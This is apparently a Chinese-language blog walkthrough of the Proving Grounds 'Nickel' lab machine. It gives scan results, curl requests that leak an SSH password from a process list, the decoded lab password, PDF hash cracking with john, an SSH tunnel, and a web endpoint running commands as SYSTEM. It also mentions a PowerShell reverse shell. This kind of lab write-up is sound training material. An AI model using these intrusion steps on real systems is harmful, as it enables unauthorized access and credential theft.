临渊羡鱼

退而结网

0%

Proving Grounds Practice - Nickel

Posted on In , ,
Proving Grounds Practice Lab中Nickel打靶过程记录

Difficulty

medium

scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
[*] ftp found on tcp/21.
     FileZilla ftpd


[*] ssh found on tcp/22.
    OpenSSH for_Windows_8.1 (protocol 2.0)


[*] http found on tcp/80.
[*] tcpwrapped found on tcp/80.
    dev-api 一扫就500


[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] microsoft-ds found on tcp/445.

[*] ms-wbt-server found on tcp/3389.


[*] http found on tcp/8089.
     Microsoft-HTTPAPI/2.0

[*] unknown found on tcp/5040.

[*] http found on tcp/33333.
    /list-active-nodes
    /list-current-deployments
    /list-running-proc


[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669

80

dev-api, gobuster 扫一下就会500,后续无法进入,revert机器随便手动输入一个url, 提示参数错误,试着访问?whoami, 返回当前用户是 system,powershll -en xxx 反弹shell获得system权限,纳闷这题是中等难度啊,直接看了题解,正常应该80端口不对外开放的, offsec的靶机发现很多问题都是导致题目变得简单了

下面是正常的解题过程

8089

三个button点击之后都无法响应,速度极慢,查看一下源码,访问的是169.254网段ip的3333端口

33333

那就直接访问上面三个地址,都提示不支持GET请求,改成post返回错误:HTTP Error 411. The request must be chunked or have a content length

1
2
3
4
5
6
7
curl -XPOST http://192.168.111.99:33333/list-running-procs
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>

加上 -H 'Content-Length: 0重试, list-running-procs 返回了运行的进程,有一个进程中有ariah的ssh账号和密码

Foothold

ssh [email protected] 输入密码提示错误,base64 decode之后得到: NowiseSloopTheory139,成功登录

1
2
ssh ariah@192.168.111.99
ariah@NICKEL C:\Users\ariah>

Escalation

使用ariah的账号密码登录smbclient,可以正常登录,但是什么信息都没有,登录ftp发现有个pdf文件,下载后打开需要密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ftp -a -A ariah@192.168.111.99
Connected to 192.168.111.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
331 Password required for ariah
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          46235 Sep 01  2020 Infrastructure.pdf
226 Successfully transferred "/"

pdf2john Infrastructure.pdf > pdf.hash

john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash

爆破密码,打开pdf内容也很简单, 其中有command endpoint, 此时查看系统进程和端口,发现有80端口开放。

通过ssh 本地转发搭建tunnel, 后续就可以执行任意命令了

1
2
3
4
5
6
kali@kali:~$ sudo ssh -L80:192.168.120.209:80 ariah@192.168.120.209
...
Microsoft Windows [Version10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>
1
2
3
4
5
6
7
kali@kali:~$ curl http://localhost/?whoami

<!doctype html><html><body>dev-api started at 2020-09-18T11:14:22

        <pre>nt authority\system
</pre>
</body></html>kali@kali:~$